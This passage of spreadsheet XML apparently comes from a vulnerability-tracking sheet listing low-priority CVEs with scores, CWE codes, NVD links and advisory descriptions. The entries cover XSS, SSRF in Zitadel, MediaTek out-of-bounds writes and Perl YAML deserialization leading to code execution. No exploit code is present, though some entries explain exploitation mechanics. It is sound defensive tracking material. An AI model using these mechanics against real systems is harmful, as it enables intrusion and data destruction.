      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in code-projects Human Resource Management 1.0. This affects an unknown part of the file /humanresourcemanagementsystem/src/store/EventStore.php of the component Event Creation. Executing a manipulation of the argument eventSubject can lead to cross site scripting. The attack may be launched remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105173</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105188</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in code-projects Human Resource Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /views/admin/liveEventHistory.php of the component Live Event History. The manipulation of the argument eventSubject results in cross site scripting. The attack may be launched remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105188</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105217</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>Cockpit CMS 2.12.0 before 2.14.1 disables TLS certificate verification in the cron.php web worker restart request, allowing network attackers to capture the worker token. Man-in-the-middle attackers on the outbound path to site_url can present any certificate to steal the worker/web/token value and start the web worker.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105217</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105164</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-125</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in NASA cFS up to 7.0.1. This issue affects the function CFE_FS_ParseInputFileNameEx of the file cfe/modules/fs/fsw/src/cfe_fs_api.c. This manipulation causes out-of-bounds read. Remote exploitation of the attack is possible. The pull request to fix this issue awaits acceptance.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105164</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105179</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-310, CWE-311</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in SourceCodester Drug Recommendation System 1.0. This affects an unknown function of the file Admin/add_user.php of the component Password Handler. Executing a manipulation of the argument Password can lead to missing encryption of sensitive data. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105179</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105214</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>Zitadel before 4.16.2 contains a server-side request forgery vulnerability that allows attackers to make the server request internal resources through organization domain HTTP verification. The challenge fetch uses Go's default http.Get instead of the protected client, so attackers can register domains that redirect to loopback, internal, or cloud metadata addresses to scan ports and map internal networks.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105214</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2017-20285</t>
        </is>
      </c>
      <c r="D88" s="5" t="inlineStr"/>
      <c r="E88" s="5" t="inlineStr"/>
      <c r="F88" s="5" t="inlineStr"/>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-502</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>YAML versions before 1.30 for Perl allow a loaded document to trigger the DESTROY method of arbitrary classes.
A perl/hash:Class tag blesses a hash into the class it names. The document supplies the object's fields, and Perl calls DESTROY when it goes out of scope.
What DESTROY does depends on the classes the process has loaded. With File::Temp::Dir from core Perl, it can delete a directory tree the document names.</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2017-20285</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2019-25777</t>
        </is>
      </c>
      <c r="D89" s="5" t="inlineStr"/>
      <c r="E89" s="5" t="inlineStr"/>
      <c r="F89" s="5" t="inlineStr"/>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-914</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>YAML versions before 1.27_001 for Perl allow a loaded perl/glob document to replace any package variable, which can lead to arbitrary code execution.
A perl/glob document names a package and a symbol, and supplies the value assigned to it. Nothing restricts the name, so the target can be @INC or YAML's own load options.
A perl/glob document that sets $YAML::LoadCode or $YAML::UseCode turns on code loading, which is off by default, for every later Load() in the process. A perl/code document is then passed to a string eval, so an attacker who supplies two documents to separate Load() calls in one process can execute arbitrary Perl code.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2019-25777</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13607</t>
        </is>
      </c>
      <c r="D90" s="5" t="inlineStr"/>
      <c r="E90" s="5" t="inlineStr"/>
      <c r="F90" s="5" t="inlineStr"/>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr"/>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>The File Uploads Addon for WooCommerce WordPress plugin through 1.7.6 stores customer-uploaded files in a publicly web-accessible uploads directory and the access restriction it generates is ineffective, so an unauthenticated attacker who knows or guesses a file's name can retrieve customer-uploaded files directly, bypassing the File Uploads Addon for WooCommerce WordPress plugin through 1.7.6's authenticated download mechanism.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13607</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19954</t>
        </is>
      </c>
      <c r="D91" s="5" t="inlineStr"/>
      <c r="E91" s="5" t="inlineStr"/>
      <c r="F91" s="5" t="inlineStr"/>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-176</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>Net::Whois::Raw versions before 2.99044 for Perl ship a pwhois command-line tool that queries WHOIS for the wrong domain for unicode domain names.
pwhois encodes each non-ASCII label directly using Net::IDN::Punycode and prepends xn--. Apart from lowercasing ASCII and Cyrillic letters, it skips the IDNA mapping and normalization steps, so a label with other uppercase letters, or not in NFC, encodes to a different A-label than its IDNA form. For example, a label of U+00C9 followed by "cole" encodes to "xn--cole-pka" rather than "xn--cole-9oa".
The Net::Whois::Raw library modules are not affected.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19954</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20519</t>
        </is>
      </c>
      <c r="D92" s="5" t="inlineStr"/>
      <c r="E92" s="5" t="inlineStr"/>
      <c r="F92" s="5" t="inlineStr"/>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S92"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not needed for exploitation. Patch ID: MOLY01778993; Issue ID: MSV-8898.</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20519</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20520</t>
        </is>
      </c>
      <c r="D93" s="5" t="inlineStr"/>
      <c r="E93" s="5" t="inlineStr"/>
      <c r="F93" s="5" t="inlineStr"/>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S93"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not needed for exploitation. Patch ID: MOLY01778988; Issue ID: MSV-8897.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20520</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20521</t>
        </is>
      </c>
      <c r="D94" s="5" t="inlineStr"/>
      <c r="E94" s="5" t="inlineStr"/>
      <c r="F94" s="5" t="inlineStr"/>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>In Video HAL, there is a possible escalation of privilege due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11375674; Issue ID: MSV-9571.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20521</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20522</t>
        </is>
      </c>
      <c r="D95" s="5" t="inlineStr"/>
      <c r="E95" s="5" t="inlineStr"/>
      <c r="F95" s="5" t="inlineStr"/>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>In neuropilot, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11249050; Issue ID: MSV-9172.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20522</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20523</t>
        </is>
      </c>
      <c r="D96" s="5" t="inlineStr"/>
      <c r="E96" s="5" t="inlineStr"/>
      <c r="F96" s="5" t="inlineStr"/>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>In neuropilot, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11249062; Issue ID: MSV-9171.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20523</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20524</t>
        </is>
      </c>
      <c r="D97" s="5" t="inlineStr"/>
      <c r="E97" s="5" t="inlineStr"/>
      <c r="F97" s="5" t="inlineStr"/>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>CWE-1285</t>
        </is>
      </c>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>In apu, there is a possible memory corruption due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11249004; Issue ID: MSV-9170.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20524</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20525</t>
        </is>
      </c>
      <c r="D98" s="5" t="inlineStr"/>
      <c r="E98" s="5" t="inlineStr"/>
      <c r="F98" s="5" t="inlineStr"/>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr"/>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01870473 / MOLY00814393; Issue ID: MSV-9041.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20525</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20526</t>
        </is>
      </c>
      <c r="D99" s="5" t="inlineStr"/>
      <c r="E99" s="5" t="inlineStr"/>
      <c r="F99" s="5" t="inlineStr"/>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
